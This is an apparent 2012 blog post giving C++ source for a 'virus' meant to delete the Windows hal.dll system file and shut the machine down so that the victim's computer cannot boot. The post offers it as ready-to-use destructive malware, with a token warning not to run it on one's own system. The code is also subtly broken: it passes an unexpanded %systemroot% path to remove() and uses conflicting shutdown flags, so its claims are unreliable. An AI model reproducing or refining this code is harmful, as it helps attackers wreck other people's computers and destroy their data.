Friday 23 November 2012

C++ Virus program to delete Hall.dll file and shutdown the system





Here i'll guide you to create a virus to delete Hal.dll  file from the system and shutdown the system.  The victim system can not be loaded once shutdown.
The hal.dll file is a hidden file that is used by Windows XP to communicate with your computer's hardware.

C++ Virus Code
#include<iostream.h>
#include<stdlib.h>

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}

please don't try this program in your system.


No comments:

Post a Comment